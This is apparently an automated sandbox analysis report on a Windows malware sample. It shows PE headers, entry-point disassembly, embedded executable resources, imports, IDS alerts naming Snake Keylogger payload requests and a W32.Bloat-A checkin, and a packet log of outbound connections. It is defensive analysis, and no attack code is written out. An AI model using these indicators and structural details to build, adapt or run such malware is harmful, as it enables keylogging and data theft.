                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                                                    Instruction
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    add esp, FFFFFFF0h
                                                                                                                    mov eax, 0049A778h
                                                                                                                    call 00007F58DD073DBDh
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007F58DD0C7705h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, 0049ABE0h
                                                                                                                    call 00007F58DD0C7304h
                                                                                                                    mov ecx, dword ptr [0049DBDCh]
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    mov edx, dword ptr [00496590h]
                                                                                                                    call 00007F58DD0C76F4h
                                                                                                                    mov eax, dword ptr [0049DBCCh]
                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                    call 00007F58DD0C7768h
                                                                                                                    call 00007F58DD07189Bh
                                                                                                                    add byte ptr [eax], al
                                                                                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x627a0 | .rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                                    CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc | 0xb0000 | 0x627a0 | 0x62800 | 3f4bf534b7e82a87e254331294b5d609 | False | 0.546731242068528 | data | 6.6892158308280525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                                                    RT_CURSOR | 0xb0de0 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
                                                                                                                    RT_CURSOR | 0xb0f14 | 0x134 | data | | | 0.4642857142857143
                                                                                                                    RT_CURSOR | 0xb1048 | 0x134 | data | | | 0.4805194805194805
                                                                                                                    RT_CURSOR | 0xb117c | 0x134 | data | | | 0.38311688311688313
                                                                                                                    RT_CURSOR | 0xb12b0 | 0x134 | data | | | 0.36038961038961037
                                                                                                                    RT_CURSOR | 0xb13e4 | 0x134 | data | | | 0.4090909090909091
                                                                                                                    RT_CURSOR | 0xb1518 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
                                                                                                                    RT_BITMAP | 0xb164c | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
                                                                                                                    RT_BITMAP | 0xb181c | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
                                                                                                                    RT_BITMAP | 0xb1a00 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
                                                                                                                    RT_BITMAP | 0xb1bd0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
                                                                                                                    RT_BITMAP | 0xb1da0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
                                                                                                                    RT_BITMAP | 0xb1f70 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
                                                                                                                    RT_BITMAP | 0xb2140 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
                                                                                                                    RT_BITMAP | 0xb2310 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
                                                                                                                    RT_BITMAP | 0xb24e0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
                                                                                                                    RT_BITMAP | 0xb26b0 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
                                                                                                                    RT_BITMAP | 0xb2880 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
                                                                                                                    RT_ICON | 0xb2968 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.4589587242026266
                                                                                                                    RT_ICON | 0xb3a10 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
                                                                                                                    RT_DIALOG | 0xb4ab8 | 0x52 | data | | | 0.7682926829268293
                                                                                                                    RT_STRING | 0xb4b0c | 0x358 | data | | | 0.3796728971962617
                                                                                                                    RT_STRING | 0xb4e64 | 0x428 | data | | | 0.37406015037593987
                                                                                                                    RT_STRING | 0xb528c | 0x3a4 | data | | | 0.40879828326180256
                                                                                                                    RT_STRING | 0xb5630 | 0x3bc | data | | | 0.33472803347280333
                                                                                                                    RT_STRING | 0xb59ec | 0x2d4 | data | | | 0.4654696132596685
                                                                                                                    RT_STRING | 0xb5cc0 | 0x334 | data | | | 0.42804878048780487
                                                                                                                    RT_STRING | 0xb5ff4 | 0x42c | data | | | 0.42602996254681647
                                                                                                                    RT_STRING | 0xb6420 | 0x1f0 | data | | | 0.4213709677419355
                                                                                                                    RT_STRING | 0xb6610 | 0x1c0 | data | | | 0.44419642857142855
                                                                                                                    RT_STRING | 0xb67d0 | 0xdc | data | | | 0.6
                                                                                                                    RT_STRING | 0xb68ac | 0x320 | data | | | 0.45125
                                                                                                                    RT_STRING | 0xb6bcc | 0xd8 | data | | | 0.5879629629629629
                                                                                                                    RT_STRING | 0xb6ca4 | 0x118 | data | | | 0.5678571428571428
                                                                                                                    RT_STRING | 0xb6dbc | 0x268 | data | | | 0.4707792207792208
                                                                                                                    RT_STRING | 0xb7024 | 0x3f8 | data | | | 0.37598425196850394
                                                                                                                    RT_STRING | 0xb741c | 0x378 | data | | | 0.41103603603603606
                                                                                                                    RT_STRING | 0xb7794 | 0x380 | data | | | 0.35379464285714285
                                                                                                                    RT_STRING | 0xb7b14 | 0x374 | data | | | 0.4061085972850679
                                                                                                                    RT_STRING | 0xb7e88 | 0xe0 | data | | | 0.5535714285714286
                                                                                                                    RT_STRING | 0xb7f68 | 0xbc | data | | | 0.526595744680851
                                                                                                                    RT_STRING | 0xb8024 | 0x368 | data | | | 0.40940366972477066
                                                                                                                    RT_STRING | 0xb838c | 0x3fc | data | | | 0.34901960784313724
                                                                                                                    RT_STRING | 0xb8788 | 0x2fc | data | | | 0.36649214659685864
                                                                                                                    RT_STRING | 0xb8a84 | 0x354 | data | | | 0.31572769953051644
                                                                                                                    RT_RCDATA | 0xb8dd8 | 0x44 | data | | | 0.8676470588235294
                                                                                                                    RT_RCDATA | 0xb8e1c | 0x10 | data | | | 1.5
                                                                                                                    RT_RCDATA | 0xb8e2c | 0x50800 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.5530528192934783
                                                                                                                    RT_RCDATA | 0x10962c | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
                                                                                                                    RT_RCDATA | 0x109630 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
                                                                                                                    RT_RCDATA | 0x10d230 | 0x64c | data | | | 0.5998759305210918
                                                                                                                    RT_RCDATA | 0x10d87c | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
                                                                                                                    RT_RCDATA | 0x10d9d0 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
                                                                                                                    RT_GROUP_CURSOR | 0x1121a4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
                                                                                                                    RT_GROUP_CURSOR | 0x1121b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
                                                                                                                    RT_GROUP_CURSOR | 0x1121cc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                                                    RT_GROUP_CURSOR | 0x1121e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                                                    RT_GROUP_CURSOR | 0x1121f4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                                                    RT_GROUP_CURSOR | 0x112208 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                                                    RT_GROUP_CURSOR | 0x11221c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
                                                                                                                    RT_GROUP_ICON0x1122300x14dataTurkishTurkey1.1
                                                                                                                    RT_VERSION0x1122440x304dataTurkishTurkey0.42875647668393785
                                                                                                                    RT_VERSION0x1125480x258dataChineseChina0.525
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll | OpenSCManagerA, CloseServiceHandle
wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll | Netbios
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Chinese | China |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T13:18:28.735724+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49744 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:28.773157+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49745 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:29.318163+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.11 | 49753 | 69.42.215.252 | 80 | TCP
2025-01-07T13:18:29.796536+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49754 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:29.799804+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49757 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:30.904201+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49768 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:30.922727+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49769 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:31.948079+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49780 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:31.951596+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49781 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:33.998523+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49806 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:34.040266+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49807 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:35.057851+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49818 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:35.116762+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49820 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:36.130544+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49828 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:36.170403+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49829 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:37.195532+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49840 | 142.250.185.110 | 443 | TCP
2025-01-07T13:18:37.222448+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49841 | 142.250.185.110 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    Jan 7, 2025 13:18:29.407299995 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.407403946 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.408159018 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.410142899 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.412219048 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.412333965 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.415690899 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.415704012 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.415946960 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.417825937 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.417840004 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.417872906 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.418081999 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.418276072 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.418420076 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.418426037 CET49756443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.431329012 CET44349754142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.431330919 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.459332943 CET44349756142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.463341951 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.796554089 CET44349754142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.797900915 CET44349754142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.799817085 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.799945116 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.799961090 CET49754443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.801106930 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.801146030 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.804724932 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.818173885 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.818207979 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.818301916 CET49755443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.818301916 CET49755443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.818325996 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.819145918 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.824212074 CET49755443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.845875025 CET49754443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.845890045 CET44349754142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.846446037 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.846463919 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.846615076 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.847104073 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.847107887 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.847117901 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.847121954 CET44349757142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.847383976 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.847759962 CET49757443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.847968102 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.848010063 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.848148108 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.852165937 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:29.852186918 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:29.983551979 CET49755443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:29.983573914 CET44349755142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.005094051 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.005126953 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.005312920 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.016103983 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.016119957 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.032166958 CET44349756142.250.186.161192.168.2.11
